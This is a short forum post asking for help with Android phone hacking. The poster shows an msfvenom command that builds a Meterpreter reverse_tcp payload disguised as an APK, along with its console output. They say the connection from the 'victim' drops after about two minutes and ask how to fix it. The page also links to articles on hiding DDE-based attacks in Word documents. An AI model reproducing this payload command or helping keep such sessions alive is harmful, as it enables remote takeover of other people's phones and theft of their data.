Android Phone Hacking?

Jan 26, 2017 11:31 AM
Jan 26, 2017 11:33 AM
636209981025780562.jpg

i tried this

msfvenom -p android/meterpreter/reverse_tcp LHOST={ip} LPORT={port} R >/root/FILENAME.apk

i get this

msfvenom -p android/meterpreter/reverse_tcp LHOST={ip} LPORT={port} R >/root/FILENAME.apk

No platform was selected, choosing Msf::Module::Platform::Android from the payload

No Arch selected, selecting Arch: dalvik from the payload

No encoder or badchars specified, outputting raw payload

Payload size: 8373 bytes

but when ever the victim click the app it will connect then like 2min it will close connection don't know why.

i need help

Related Articles

637263493835297420.jpg

How to Use Zero-Width Characters to Hide Secret Messages in Text (& Even Reveal Leaks)

636455706472146367.jpg

How to Hide DDE-Based Attacks in MS Word

Comments

No Comments Exist

Be the first, drop a comment!